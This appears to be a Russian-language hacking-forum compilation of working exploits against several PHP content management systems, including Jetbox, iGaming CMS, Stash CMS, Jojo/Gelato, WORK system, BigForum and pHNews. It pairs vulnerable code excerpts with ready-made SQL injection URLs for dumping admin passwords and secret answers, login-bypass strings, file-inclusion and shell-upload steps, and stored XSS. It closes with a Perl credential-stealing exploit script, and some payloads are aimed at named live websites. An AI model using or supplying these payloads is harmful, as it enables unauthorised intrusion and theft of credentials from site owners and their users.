allow_url_include = On http://localhost/jetbox/?view=-1'+union+select+1,"http://www.site.com/shell.txt",3,4,5,6,7,8,9,10,11,12+--+ http://ghostwriterreviews.com/jetbox/view/1'+union+select+1,0x2F6574632F706173737764,3,4,5,6,7,8,9,10,11,12+--+ ---------------------------- blogs.php PHP: ... if ($item<>'' && is_numeric($item)) { $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id AND struct.id=".$item; } elseif($option=='last10'){ $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC LIMIT 10"; } else{ $sqlselect1 = "SELECT *, struct.id AS struct_id FROM blog, struct WHERE struct.container_id=".$container_id." ".$wfqadd." 
AND struct.content_id=blog.b_id ORDER BY blog.b_id DESC"; } #echo $sqlselect1; $result1 = mysql_prefix_query ($sqlselect1) or die (mysql_error()); $blogscount= mysql_num_rows($result1); if ($blogscount>'0') { $view_tpl = new Template("./"); $view_tpl->set_file("block", "blogs_item_tpl.html"); $view_tpl->set_block("block", "blogs","blogsz"); $view_tpl->set_var(array("absolutepathfull"=>$absolutepathfull )); while ($resultarray = mysql_fetch_array($result1)){ $records[1][5]=$resultarray["b_id"]; ob_start(); loggedin_workflow(); $containera = ob_get_contents(); ob_end_clean(); ... if ($item<>'' && is_numeric($item)) { //$t->set_var("containera", "add comments", true); $sqlselect1 = "SELECT * FROM blog_comments WHERE blog_id=".$id." ORDER BY blog_comments.c_id ASC"; $result1 = mysql_prefix_query($sqlselect1) or die (mysql_error()); $blog_commentcount= mysql_num_rows($result1); if ($blog_commentcount>'0') { $view_tpl2 = new Template("./"); $view_tpl2->set_file("block", "blog_comment_item_tpl.html"); $view_tpl2->set_block("block", "blog_comment","blog_commentz"); ... SQL rg=on http://localhost/jetbox/index.php?view=blog&item=1&id=1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+ http://localhost/jetbox/view/blog/item/1/id/1+union+select+1,2,user_password,4,5,type,user_password+from+user+--+ Работает, если в блоге есть хотя бы одна запись. Получаем логин и пароль (не хеш) от админки.
iGaming iGaming CMS Product : iGaming CMS version : 1.5 site : forums.igamingcms.com SQL injection mq=off games.php PHP: $sql = "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` "; if (!empty($_REQUEST['title'])) { $sql .= "WHERE `title` LIKE '$_REQUEST[title]%' "; if (!empty($_REQUEST['section'])) { $sql .= " AND `section` = '$_REQUEST[section]' "; } $sql .= " AND `published` = '1' "; } else { if (!empty($_REQUEST['section'])) { $sql .= "WHERE `section` = '$_REQUEST[section]' AND `published` = '1' "; } else { $sql .= "WHERE `published` = '1' "; ... if ($sql == "SELECT `id`,`title`,`section`,`genre`,`developer`,`publisher`,`release_date` FROM `sp_games` WHERE `published` = '1' ORDER BY `title` ASC") Code: http://localhost/games.php?order=genre§ion=%27+and+1=0+union+all+select+1,version%28%29,3,4,5,6,7--+&sort= index.php Code: http://localhost/index.php?do=viewarticle&id=2'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8,9--+ previews.php PHP: $preview = $db->Execute("SELECT * FROM `sp_previews` WHERE `id` = '$_REQUEST[id]'"); Code: http://localhost/previews.php?do=view&id=1'+union+all+select+1,2,3,4,5--+ Admin Panel (SQL inj) (LFI) LFI : support.php PHP: require_once("../sources/docs/$_REQUEST[id].php"); Code: http://localhost/admin/support.php?id=../../file%00 SQL injection : screenshots.php mq=off PHP: if (isset($_REQUEST['s'])) { $latestPreview = $db->Execute("SELECT id,title,section FROM `sp_screenshots` WHERE `section` = '$_REQUEST[s]' ORDER BY `id` DESC"); Code: http://localhost/admin/screenshots.php?s=1'+and+1=0+union+all+select+1,version(),3--+
Stash CMS 1.0.3 1) bypass (требования: mq=off) file: /admin/library/authenticate.php PHP: function login($username,$password,$remember,$location){ $database = new Db(); $results = $database->sqlQuery("SELECT user_key,user_firstname,user_lastname, user_admin FROM ".TBPREFIX."_user WHERE user_password = '$password' AND user_username = '$username'"); if($results){ foreach($results as $results){ $userkey = $results['user_key']; $firstname = $results['user_firstname']; $lastname = $results['user_lastname']; $admin = $results['user_admin']; } $name = $firstname." ".$lastname; $uniquekey = $name.$userkey; $uniquekey = md5($uniquekey); $_SESSION['username'] = $name; $_SESSION['userkey'] = $userkey; $_SESSION['uniquekey'] = $uniquekey; $_SESSION['admin'] = $admin; if ($remember == true){ setcookie("bsm", $userkey, time()+108000); /* expire in 30 days */ setcookie("msb", $uniquekey, time()+108000); /* expire in 30 days */ } header('location:'.$location); }else{ return false; } } result: login: ' or '1'='1 pass: asd ------------------- боян ------------------- 3) blind sql injection (требования: mq=off,желательно 5 ветка бд) file: resetpassword.php PHP: $username = $_POST['username']; $check = $database->sqlQuery("SELECT count(*) as cnt FROM ".TBPREFIX."_user WHERE user_username = '$username'",TRUE,FALSE); if($check['cnt'] == 0){ if ($username == '') { $msg = 'You must enter your Username'; }else { $msg = $username. " doesn't exist"; } result: Тыкаем в /admin/login.php Forgot your password, в поле username пишем : Code: '/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)/**/and/**/'1'='1 ......
Ресурс http://download.ru/products/tiger-cms редактирование раздела в админке файл edit.php PHP: ... check_var($_GET['id']); $id_site = $_GET['id']; $get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1"); if(mysql_num_rows($get_site) == 0) { mysql_query("INSERT INTO content(razdel_id,text) VALUES('".$id_site."','Текст')"); } $get_site = mysql_query("SELECT * FROM content WHERE razdel_id = '".$id_site."' LIMIT 1"); list($id,$razdel_id_id,$text) = mysql_fetch_array($get_site); $get_razdel_name = mysql_query("SELECT name FROM razdeli WHERE id='".$id_site."' LIMIT 1"); list($razdel_name) = mysql_fetch_array($get_razdel_name);... функция из /admin/functions.php : PHP: ... function check_var($var) { if(!isset($var)) { die ("<script language='Javascript'>function reload() {location = \"index.php\"}; setTimeout('reload()', 0);</script>"); } } ... 1) SQL inj: Вывод в редактор !!! 2) Путь если ошибки включены. Файл admin\modules\razdel\delete.php: PHP: ... check_var($_GET['id']); $id = $_GET['id']; mysql_query("DELETE FROM razdeli WHERE id = '".$id."' LIMIT 1"); mysql_query("DELETE FROM content WHERE razdel_id = '".$id."' LIMIT 1"); echo 'Раздел удален'; ... 1) SQL inj: Файл admin\modules\razdel\save_content.php: PHP: ... check_var($_GET['site_id']); check_var($_POST['text']); check_var($_POST['razdel_name']); mysql_query("UPDATE razdeli SET name = '".$_POST['razdel_name']."' WHERE id='".$_GET['site_id']."' LIMIT 1"); mysql_query("UPDATE content SET text = '".$_POST['text']."' WHERE razdel_id = '".$_GET['site_id']."' LIMIT 1"); echo 'Раздел обновлен';... 1) SQL inj: нужно еще устанавливать пост: $_POST['text'], $_POST['razdel_name'] если не будет -переадресация ... 2. $_POST['razdel_name']'[SQL] должны быть установлены: - $_POST['text'] - action: Code: admin/index.php?module=razdel&task=save_content&site_id=13 3. 
$_POST['text']'[SQL] должны быть установлены: - $_POST['razdel_name'] - action: Code: index.php?module=razdel&task=save_content&site_id=13 Файл admin\modules\news\edit.php : PHP: ... check_var($_GET['id']); $id = $_GET['id']; $get_news_e = mysql_query("SELECT id,title,text,alltext FROM news WHERE id='".$id."' LIMIT 1"); list($id_news_e,$title_e,$text_e,$alltext_e) = mysql_fetch_array($get_news_e); ... 1) пути; 2) http://localhost/triger/center3/admin/index.php?module=news&task=edit&id=6'[SQL]; пример: Файл admin\modules\news\create.php: PHP: ... check_var($_POST['title']); $title = $_POST['title']; check_len($title,200); clear_my_string($title); $date = date("Y-m-d"); mysql_query("INSERT INTO news(title,text,alltext,date) VALUES('".$title."','".$_POST['text']."','".$_POST['alltext']."','".$date."')"); ... 1) SQL inj $_POST['alltext']'[SQL] обязательны: - $_POST['text']' 2) SQL inj $_POST['text']'[SQL] обязательны: - $_POST['alltext']; Файл admin\modules\news\delete.php: PHP: ... check_var($_GET['id']); $id = $_GET['id']; mysql_query("DELETE FROM news WHERE id = '".$id."' LIMIT 1"); echo 'Новость удалена'; ... 1) http://site/admin/index.php?module=news&task=delete&id=6'[SQL] Файл \admin\modules\news\save_news.php: PHP: ... check_var($_GET['id']); check_var($_POST['title']); check_var($_POST['text']); check_var($_POST['alltext']); $id = $_GET['id']; $title = $_POST['title']; $text = $_POST['text']; $all_text = $_POST['alltext']; $date = date("Y-m-d"); mysql_query("UPDATE news SET title = '".$title."',text = '".$text."',alltext = '".$all_text."',date='".$date."' WHERE id='".$id."' LIMIT 1"); echo 'Новость обновлена'; ... 1) SQL injection не привожу, аналогично, за пост не забываем ... Файл \admin\modules\tags\save.php : 1) SQL inj update... Условия: 1) mq=off; 2) админка;
Jojo CMS 1.0 Release Candidate 2 Официальный сайт: http://www.jojocms.org/ Последняя версия: Jojo CMS 1.0 Release Candidate 2(релиз 28 сентября 2009) 1)SQL-Injection Требования: отсутствуют. Путь до уязвимого скрипта: ../gelato/index.php Эксплуатация(по умолчанию админские данные лежат в таблице "gel_users"): Code: http://127.0.0.1/gelato/gelato/index.php?post=100500+union+select+1,concat%28user%28%29,0x3a,version%28%29,0x3a,database%28%29%29,3,4,5,6,7+--+ Реальный сайт: Code: http://jazzfaggot.ru/index.php?post=100500+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7+--+ Причина возникновения уязвимости: ошибка в логике проверки получаемых данных. PHP: if (isset($_GET["post"])) { $id_post = $_GET["post"]; if (!is_numeric($id_post) && $id_post < 1 ){ //достаточно выполнить только одно условие, для того чтобы пройти проверку на корректность header("Location: index.php"); } } else { if (isset($param_url[1]) && $param_url[1]=="post") { $id_post = (isset($param_url[2])) ? ((is_numeric($param_url[2])) ? $param_url[2] : NULL) : NULL; } else { $id_post = NULL; } } 2) SQL-Injection(админка) Требования: доступ к администраторской панели Путь до уязвимого скрипта: ../gelato/gelato/admin/user.php Эксплуатация: Code: http://127.0.0.1/gelato/gelato/admin/user.php?edit=2+union+select+1,2,3,4,5,6,7 Причина возникновения уязвимости: полное отсутствие фильтрации. 3)Path dislocure: Требования: вывод ошибок. Путь до уязвимого скрипта: ../gelato/index.php Эксплуатация: Code: [I]http://127.0.0.1/gelato/gelato/index.php?post[]=100500[/I] Реальный сайт: Code: http://madsc.iz.rs/index.php?post[]=8[/INDENT][/I] 4)Заливка шелла Требования: доступ в админку. 
Путь до уязвимого скрипта: ../gelato/admin/index.php Код уязвимого скрипта: PHP: if ($_POST["type"]=="2") { //слово "photo" переводится в числовой аналог скриптом, проинклюженным до этого if (isset($_POST["url"]) && $_POST["url"]!="") { $photoName = getFileName($_POST["url"]); //проверки на расширение нет-с if (!$tumble->savePhoto($_POST["url"])) { header("Location: ".$conf->urlGelato."/admin/index.php?photo=false"); die(); } $_POST["url"] = "../uploads/".sanitizeName($photoName); }[/I] [B] Эксплуатация: http://127.0.0.1/gelato/gelato/admin/index.php?new=photo В качестве фотографии выбираете ваш шелл, любое расширение, создаёте пост. Шелл будет загружен в папку uploads. Для того чтобы не спалить шелл на главной странице удалите ваш пост, шелл при этом удалён не будет. Также уязвим модуль загрузки фотографии\музыки\видео\итд. Причина возникновения уязвимости: отсутствие проверки на расширение. 5)Активная XSS Требования: включена возможность комментирования. Путь до уязвимого скрипта: ../gelato/index.php Уязвимое поле: <textarea name="content" id="content" cols="100" rows="10" tabindex="4"></textarea> Эксплуатация: занесите в уязвимое поле ваш java-script, предварительно закрыв тэг(">) Сайт с алертом: http://madsc.iz.rs/index.php/post/37.
WORK system CMS e-commerce http://sourceforge.net/projects/worksystem/ module/catalogue/view_catalogue.php PHP: $select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : ""; ... #read data of product supplier : addresses $error_select = ""; $total_select = 0; $query_selecta = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,b.POSTCODE as POSTCODEA,b.ADDRESS as ADDRESSA,b.TOWN as TOWNA,b.COUNTRY as COUNTRYA,b.USERNAME as USERNAMEA,b.EMAIL as EMAILA,b.PHONE as PHONEA,b.WEB_SITE as WEBSITEA FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."USER b where ID_CATALOGUE=".$select_catalogue." and a.CREATOR=b.USERID "; ... $query_select = "SELECT a.CREATOR,a.CUSTOMER_TYPE_ID,c.POSTCODE,c.ADDRESS,c.TOWN,c.COUNTRY,c.EMAIL,c.COMPANY_NAME,c.PHONE FROM ".$g_db_prefix."CATALOGUE_SUPPLIER a, ".$g_db_prefix."SHOPPING_DELIVERY c where ID_CATALOGUE=".$select_catalogue." and c.USERID=a.CREATOR"; ... $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME, UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS, PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY, COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue"; SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2+union+select+1,2,3,4,5,6,version%28%29,user(),9,10+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,2,3,4,5,6,user(),8,9+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# SQL http://localhost/worksystem_4_0_39/module/catalogue/view_catalogue.php?select_catalogue=1+and+1=2++union+select+1,version(),3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+&work_url=04eaaac39da09ffd351cf366b0bd70aa# ----------------------- module/booking/view_room.php PHP: 
$select_catalogue = ( isset($_REQUEST['select_catalogue']) and intval($_REQUEST['select_catalogue']) >= 1 ) ? $_REQUEST['select_catalogue'] : ""; ... $query_select = "SELECT ID,TITLE,STATE,LINK,DESCRIPTION,CREATOR,FILE_NAME,RESUME, UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION, ID_THEMA, HITS, PRICE,DISCOUNT,ID_CURRENCY,STOCK,STOCK_CURRENT,PERIOD_DELIVERY, COLORS1,COLORS2,COLORS3,COLORS4,COLORS5,COLORS6,REFERENCE_FREE FROM ".$g_db_prefix."CATALOGUE where ID=$select_catalogue"; SQL http://localhost/worksystem_4_0_39/module/booking/view_room.php?amp;work_url=0168e286bf&select_catalogue=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version()+limit+1,1 ----------------------- module\forum\detailforum.php PHP: include($g_include_forum."include_display_detailforum.php"); include_config.php PHP: global_register('GET','POST'); function global_register() { $num_args = func_num_args(); if ($num_args > 0) { for ($i = 0; $i < $num_args; $i++) { $method = strtoupper(func_get_arg($i)); if (($method != 'SESSION') && ($method != 'GET') && ($method != 'POST') && ($method != 'SERVER') && ($method != 'COOKIE') && ($method != 'ENV')) { die("The \"$method\" is invalid argument, The argument of global_register must be the following: GET, POST, SESSION, SERVER, COOKIE, or ENV"); } $varname = "_{$method}"; global ${$varname}; foreach (${$varname} as $key => $val) { global ${$key}; ${$key} = $val; } } }else{ die('You must specify at least one argument'); } } module\forum\include\include_display_detailforum.php PHP: $query_select = "SELECT ID,ID_INIT,TITLE,STATE,DESCRIPTION,CREATOR,UNIX_TIMESTAMP(DATE_CREATION) as DATE_CREATION,LINK FROM ".$g_db_prefix."FORUM_INIT where ID=$select_forum and STATE=$state_display $profile_forum order by ORDER_DISPLAY asc, DATE_CREATION asc"; SQL http://localhost/worksystem_4_0_39/module/forum/detailforum.php?select_forum=3+union+select+1,2,user(),4,version(),6,7,8+--+&work_url=2fa5af6c22# ------------------------ 
module\news\view_news.php PHP: $select_news = ( isset($_REQUEST['select_news']) and intval($_REQUEST['select_news']) >= 1 ) ? $_REQUEST['select_news'] : ""; ... $query_select = "SELECT a.ID,a.TITLE,a.STATE,a.LINK,a.DESCRIPTION,b.CREATOR,a.FILE_NAME, UNIX_TIMESTAMP(a.DATE_CREATION) as DATE_CREATION,a.WHERE_IMAGE,a.SIZE_IMAGE,a.HITS,a.WRAPPER FROM ".$g_db_prefix."NEWS a, ".$g_db_prefix."NEWS_SUPPLIER b where ID=$select_news and a.ID=b.NEWS_ID "; SQL http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,user(),3,database(),version(),6,7,8,9,10,11,12+--+ ------------------------------ Заходим админом Кроме стандартного захода login : password, предусмотрен login : Secret answer, причем Secret answer хранится в таблице user открытым текстом. Узнаем префикс таблиц в базе. http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,TABLE_NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+information_schema.tables+--+ http://www.artpeinture.fr/work/module/news/view_news.php?select_news=12+union+select+1,TABLE_NAME,3,TABLE_SCHEMA,5,6,7,8,9,10,11,12+from+information_schema.tables+--+&work_url=8cd560377a Читаем username и Secret answer http://localhost/worksystem_4_0_39/module/news/view_news.php?select_news=12+union+select+1,name,3,ANSWER,5,6,7,8,9,10,11,12+from+work_user+--+ Запасной вход http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=admin&work_url=8cd560377a или http://localhost/worksystem_4_0_39/module/user/forget_password.php?f_username=blabla'+or+GROUP_ID=7+--+&work_url=8cd560377a вводим секретный ответ и мы админы.
BigForum Version: 4.5 http://sourceforge.net/projects/npage-bigforum/ SQL Injection: (Need mq = off) Будет редирект на значение 3 поля. В Author / Erstellen Залитие шелла: Выбираем как аватару шелл, и заливаем, /images/avatar/ . BigForum 4.5 SQL INJ EXPLOIT. PHP: #!/usr/bin/perl use LWP::Simple; print "\n"; print "##############################################################\n"; print "# BigForum Version: 4.5 SQL INJECTION #\n"; print "# Author: Ctacok (Russian) #\n"; print "# Blog : www.Ctacok.ru #\n"; print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n"; print "# Require : Magic_quotes = Off #\n"; print "##############################################################\n"; if (@ARGV < 2) { print "\n Usage: exploit.pl [host] [path] "; print "\n EX : exploit.pl www.localhost.com /path/ \n\n"; exit; } $host=$ARGV[0]; $path=$ARGV[1]; $vuln = "-1'+union+select+1,concat(0x3a3a3a,id,0x3a,username,0x3a,pw,0x3a3a3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users"; $doc = get($host.$path."profil.php?id=".$vuln."+--+"); if ($doc =~ /:::(.+):(.+):(.+):::/){ print "\n[+] Admin id: : $1"; print "\n[+] Admin username: $2"; print "\n[+] Admin password: $3"; } Dork:
pHNews product : pHNews-alpha1-normal SQL injection modules/comments.php - code PHP: if ($ii >= $messagespp) { // Find out how many pages $pages = $ii / $messagespp; $pages = ceil($pages); $pages++; $page++; $pagesm = $pages - 1; $comm_output .= pages($pagesm,"?mod=comments&id=".$_GET['id']."&page="); } unset($tmp_ended); $sql = "SELECT lastread FROM Users WHERE UName = '$user_uname'"; $result = mysql_query($sql) or die('Query failed: ' . mysql_error()); $row = mysql_fetch_array($result, MYSQL_ASSOC); $exploaded = $pHNews->explodeAssoc("&", $row['lastread']); $exploaded[$_GET['id']] = time(); $sql = "UPDATE Users SET lastread='".$pHNews->implodeAssoc("&", $exploaded)."' WHERE UName = '$user_uname';"; mysql_query($sql); $mod_output .= mysql_error(); result mq=off SQL Injection Code: http://localhost/upload/indexfix.php?mod=comments&id=1'+and+0+union+all+select+1,version(),3,4,5,6,7,8--+ Blind SQL Injection Code: http://localhost/upload/indexfix.php?mod=comments&user_uname=[blind sql] modules/view_profile.php PHP: //$sql = "SELECT * FROM `Users` WHERE `UName`='{$_GET['user']}'"; //$result = mysql_query($sql) or die('Query failed: ' . 
mysql_error()); //$row = mysql_fetch_array($result); $row = $pHNews->get_user_info("", $_GET['user']); result : Code: http://localhost/upload/indexfix.php?mod=view_profile&user='+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+ Local File Inclusion module/comments.php - code PHP: include "./$templates_dir/$template/comments.php"; mq=off result : Code: http://localhost/upload/modules/comments.php?templates_dir=../../upload/[file]%00 Code: http://localhost/upload/modules/comments.php?template=../../upload/[file]%00 (с) milw0rm SQL injection + Local File Inclusion mq=off rg=on Code: http://localhost/upload/indexfix.php?mod=view_profile'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=login'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=usercp'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=admin'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=register'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=news'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=about'+and+0+union+all+select+[LFI],2--+ http://localhost/upload/indexfix.php?mod=terms'+and+0+union+all+select+[LFI],2--+